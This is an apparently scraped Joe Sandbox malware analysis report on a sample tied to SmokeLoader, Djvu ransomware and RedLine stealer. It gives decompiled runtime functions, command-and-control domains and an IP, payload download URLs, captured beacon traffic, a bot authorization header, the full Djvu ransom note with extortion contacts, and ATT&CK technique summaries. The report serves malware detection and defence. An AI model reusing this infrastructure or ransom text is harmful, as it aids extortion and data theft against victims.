Snapshot File: hcaresult_7_2_400000_beirutt.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: 9b33654489cf64309de15f328fe2c86363dec06c71ad02128e9910e44cf057a6
Instruction ID: 65f318711503c5cd971fb30b99481ca55cbdf04538f1220dae6bb8a6ce500498
Opcode Fuzzy Hash: 9b33654489cf64309de15f328fe2c86363dec06c71ad02128e9910e44cf057a6
Instruction Fuzzy Hash: 9CF03030A40A09D2DF006BA1AD0A7AF7A78BB80742F9204F5E192B05E4DF759475D24A

Uniqueness

Uniqueness Score: -1.00%

Function 0040A1A5 Relevance: 6.0, APIs: 4, Instructions: 49
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0040A1A5(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;
				void* _t28;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E00409A96(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t34 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E00409B86(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E0040A0AB(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E00409FF0(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}

0x0040a1aa
0x0040a1b0
0x0040a223
0x00000000
0x0040a1b7
0x0040a1b7
0x0040a1ba
0x0040a1d5
0x0040a1d8
0x0040a1f8
0x0040a20a
0x0040a1da
0x0040a1da
0x0040a1dd
0x00000000
0x0040a1df
0x0040a1f1
0x0040a1f1
0x0040a1dd
0x0040a228
0x0040a22c
0x0040a1bc
0x0040a1d4
0x0040a1d4
0x0040a1ba

APIs

__cftof_l.LIBCMT ref: 0040A1CB

Part of subcall function 00409FF0: __fltout2.LIBCMT ref: 0040A01C

__cftog_l.LIBCMT ref: 0040A1F1
__cftoe_l.LIBCMT ref: 0040A223

Memory Dump Source

Source File: 00000007.00000002.572696263.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.572660674.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.572866987.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.572886161.0000000000412000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.573058769.0000000000427000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.573105153.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_beirutt.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction ID: bd12eb7fbf19b7960c4a92c1d962089a67ab9531ad6616119e9025b97fb1b0a2
Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction Fuzzy Hash: 0E11753204014EBBCF125E85DC058EE3F62BF59354F18856AFE1868171D63BC9B1AB86

Uniqueness

Uniqueness Score: -1.00%

Function 00408826 Relevance: 6.0, APIs: 4, Instructions: 31
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 90%

			E00408826(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t13;
				intOrPtr _t27;
				intOrPtr _t29;
				void* _t30;
				void* _t31;

				_t31 = __eflags;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ebx;
				_push(0xc);
				_push(0x40f558);
				E004051A4(__ebx, __edi, __esi);
				_t29 = E00405771(__ebx, __edx, _t31);
				_t13 =  *0x411b44; // 0xfffffffe
				if(( *(_t29 + 0x70) & _t13) == 0) {
					L6:
					E004046AA(_t22, _t25, _t26, 0xc);
					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
					_t8 = _t29 + 0x6c; // 0x6c
					_t27 =  *0x411610; // 0x411538
					 *((intOrPtr*)(_t30 - 0x1c)) = E004087E8(_t8, _t27);
					 *(_t30 - 4) = 0xfffffffe;
					E00408890();
				} else {
					_t33 =  *((intOrPtr*)(_t29 + 0x6c));
					if( *((intOrPtr*)(_t29 + 0x6c)) == 0) {
						goto L6;
					} else {
						_t29 =  *((intOrPtr*)(E00405771(_t22, __edx, _t33) + 0x6c));
					}
				}
				if(_t29 == 0) {
					E00403FF1(0x20);
				}
				return E004051E9(_t29);
			}

0x00408826
0x00408826
0x00408826
0x00408826
0x00408826
0x00408828
0x0040882d
0x00408837
0x00408839
0x00408841
0x00408865
0x00408867
0x0040886d
0x00408871
0x00408874
0x0040887f
0x00408882
0x00408889
0x00408843
0x00408843
0x00408847
0x00000000
0x00408849
0x0040884e
0x0040884e
0x00408847
0x00408853
0x00408857
0x0040885c
0x00408864

APIs

__getptd.LIBCMT ref: 00408832

Part of subcall function 00405771: __getptd_noexit.LIBCMT ref: 00405774
Part of subcall function 00405771: __amsg_exit.LIBCMT ref: 00405781

__getptd.LIBCMT ref: 00408849
__amsg_exit.LIBCMT ref: 00408857
__lock.LIBCMT ref: 00408867

Memory Dump Source

Source File: 00000007.00000002.572696263.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.572660674.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.572866987.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.572886161.0000000000412000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.573058769.0000000000427000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.573105153.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_beirutt.jbxd

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: 30be4b4ce25a8ad4b8941a032e695e39993c110a5e454163ef4b89dbcddb93f1
Instruction ID: 832184ccc45c0b0f35681996f9ca28671a04cc02bc9af1e00865026242d52c19
Opcode Fuzzy Hash: 30be4b4ce25a8ad4b8941a032e695e39993c110a5e454163ef4b89dbcddb93f1
Instruction Fuzzy Hash: D2F06D36900B00CBD620BB668506B5A72A0AF00754FA0853FA990BB2D2CF7C9900DF5E

Uniqueness

Uniqueness Score: -1.00%

Function 0040E81D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 88%

			E0040E81D(void* __ebx, void* __edx, void* __edi, intOrPtr* __esi, void* __eflags) {
				intOrPtr _t17;
				intOrPtr* _t28;
				void* _t29;

				_t30 = __eflags;
				_t28 = __esi;
				_t26 = __edx;
				_t19 = __ebx;
				 *((intOrPtr*)(__edi - 4)) =  *((intOrPtr*)(_t29 - 0x24));
				E0040E2C6(__ebx, __edx, __edi, __eflags,  *((intOrPtr*)(_t29 - 0x28)));
				 *((intOrPtr*)(E00405771(__ebx, __edx, __eflags) + 0x88)) =  *((intOrPtr*)(_t29 - 0x2c));
				_t17 = E00405771(_t19, _t26, _t30);
				 *((intOrPtr*)(_t17 + 0x8c)) =  *((intOrPtr*)(_t29 - 0x30));
				if( *__esi == 0xe06d7363 &&  *((intOrPtr*)(__esi + 0x10)) == 3) {
					_t17 =  *((intOrPtr*)(__esi + 0x14));
					if(_t17 == 0x19930520 || _t17 == 0x19930521 || _t17 == 0x19930522) {
						if( *((intOrPtr*)(_t29 - 0x34)) == 0) {
							_t37 =  *((intOrPtr*)(_t29 - 0x1c));
							if( *((intOrPtr*)(_t29 - 0x1c)) != 0) {
								_t17 = E0040E29F(_t37,  *((intOrPtr*)(_t28 + 0x18)));
								_t38 = _t17;
								if(_t17 != 0) {
									_push( *((intOrPtr*)(_t29 + 0x10)));
									_push(_t28);
									return E0040E5B5(_t38);
								}
							}
						}
					}
				}
				return _t17;
			}

0x0040e81d
0x0040e81d
0x0040e81d
0x0040e81d
0x0040e820
0x0040e826
0x0040e834
0x0040e83a
0x0040e842
0x0040e84e
0x0040e856
0x0040e85e
0x0040e872
0x0040e874
0x0040e878
0x0040e87d
0x0040e883
0x0040e885
0x0040e887
0x0040e88a
0x00000000
0x0040e891
0x0040e885
0x0040e878
0x0040e872
0x0040e85e
0x0040e892

APIs

Part of subcall function 0040E2C6: __getptd.LIBCMT ref: 0040E2CC
Part of subcall function 0040E2C6: __getptd.LIBCMT ref: 0040E2DC

__getptd.LIBCMT ref: 0040E82C

Part of subcall function 00405771: __getptd_noexit.LIBCMT ref: 00405774
Part of subcall function 00405771: __amsg_exit.LIBCMT ref: 00405781

__getptd.LIBCMT ref: 0040E83A

Strings

csm, xrefs: 0040E848

Memory Dump Source

Source File: 00000007.00000002.572696263.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.572660674.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.572866987.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.572886161.0000000000412000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.573058769.0000000000427000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.573105153.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_beirutt.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: fc36b5dd3d55e8c15b705d150f5ecce250a02b0b1e52147d57cdc30e2e9ac7d0
Instruction ID: 51d928c78abbf7e66c50e8c54c52713950ca57734d7c40e531cfd0a1a998f83e
Opcode Fuzzy Hash: fc36b5dd3d55e8c15b705d150f5ecce250a02b0b1e52147d57cdc30e2e9ac7d0
Instruction Fuzzy Hash: A1011E3A800304AACB34AE63E44066E77B5AB10315F58CC7FD440676E1DB3899A0DB09

Uniqueness

Uniqueness Score: -1.00%

Source: http://potunulit.org:80/N	Avira URL Cloud: Label: malware
Source: http://potunulit.org/J2v-m	Avira URL Cloud: Label: malware
Source: http://drampik.com/lancer/get.php	Avira URL Cloud: Label: malware
Source: http://potunulit.org/s	Avira URL Cloud: Label: malware

Source: C:\Users\user\AppData\Local\Temp\43D0.exe	ReversingLabs: Detection: 66%
Source: C:\Users\user\AppData\Local\Temp\4434343.dll	ReversingLabs: Detection: 18%
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe	ReversingLabs: Detection: 43%
Source: C:\Users\user\AppData\Local\Temp\C676.exe	ReversingLabs: Detection: 80%

Source: C:\Users\user\AppData\Roaming\beirutt	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\4434343.dll	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\C676.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\43D0.exe	Joe Sandbox ML: detected

Source: Malware configuration extractor	URLs: http://drampik.com/lancer/get.php
Source: Malware configuration extractor	URLs: 89.208.103.88:37538
Source: Malware configuration extractor	URLs: http://bulimu55t.net/
Source: Malware configuration extractor	URLs: http://soryytlic4.net/
Source: Malware configuration extractor	URLs: http://bukubuka1.net/
Source: Malware configuration extractor	URLs: http://novanosa5org.org/
Source: Malware configuration extractor	URLs: http://hujukui3.net/
Source: Malware configuration extractor	URLs: http://newzelannd66.org/
Source: Malware configuration extractor	URLs: http://golilopaster.org/

Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ryjphgb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 164Host: potunulit.org
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://egqgnqk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 215Host: potunulit.org
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://aygtqn.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 237Host: potunulit.org
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://fedface.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 291Host: potunulit.org
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://pghirnwb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 218Host: potunulit.org
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://hkrpyqspb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 284Host: potunulit.org
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jwoitvech.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 280Host: potunulit.org
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://fedbh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 331Host: potunulit.org
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://fyugji.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 152Host: potunulit.org
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://mlleyedksk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 341Host: potunulit.org
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://vjawtynvst.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 253Host: potunulit.org
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://fyeyf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 198Host: potunulit.org

Source: 00000000.00000002.397037744.00000000005F1000.00000004.10000000.00040000.00000000.sdmp	Malware Configuration Extractor: SmokeLoader {"C2 list": ["http://bulimu55t.net/", "http://soryytlic4.net/", "http://bukubuka1.net/", "http://novanosa5org.org/", "http://hujukui3.net/", "http://newzelannd66.org/", "http://golilopaster.org/"]}
Source: 00000008.00000002.479914181.0000000004980000.00000040.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: Djvu {"Download URLs": ["http://uaery.top/dl/build2.exe", "http://drampik.com/files/1/build3.exe"], "C2 url": "http://drampik.com/lancer/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-cud8EGMtyB\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0637JOsie", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\\Wi
Source: 9.3.C4AA.exe.df30000.1.unpack	Malware Configuration Extractor: RedLine {"C2 url": ["89.208.103.88:37538"], "Bot Id": "birj proliv", "Authorization Header": "9941068ef2768ed5ba54fc3eed22d795"}

Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443

Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.88
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.88
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.88
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.88
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.88
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.88

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Djvu

Threatname: RedLine

Threatname: SmokeLoader

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\43D0.exe

C:\Users\user\AppData\Local\Temp\4434343.dll

C:\Users\user\AppData\Local\Temp\C4AA.exe

C:\Users\user\AppData\Local\Temp\C676.exe

C:\Users\user\AppData\Roaming\beirutt

C:\Users\user\AppData\Roaming\beirutt:Zone.Identifier

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Windows Analysis Report
file.exe

Function 00401558 Relevance: 10.7, APIs: 7, Instructions: 206
nativeCOMMON

Function 00401564 Relevance: 10.7, APIs: 7, Instructions: 175
nativeCOMMON

Function 00401577 Relevance: 10.7, APIs: 7, Instructions: 168
nativeCOMMON

Function 00401523 Relevance: 10.7, APIs: 7, Instructions: 168
nativeCOMMON

Function 0040158C Relevance: 10.7, APIs: 7, Instructions: 168
nativeCOMMON

Function 00401585 Relevance: 10.7, APIs: 7, Instructions: 165
nativeCOMMON

Function 0040159A Relevance: 10.7, APIs: 7, Instructions: 160
nativeCOMMON

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
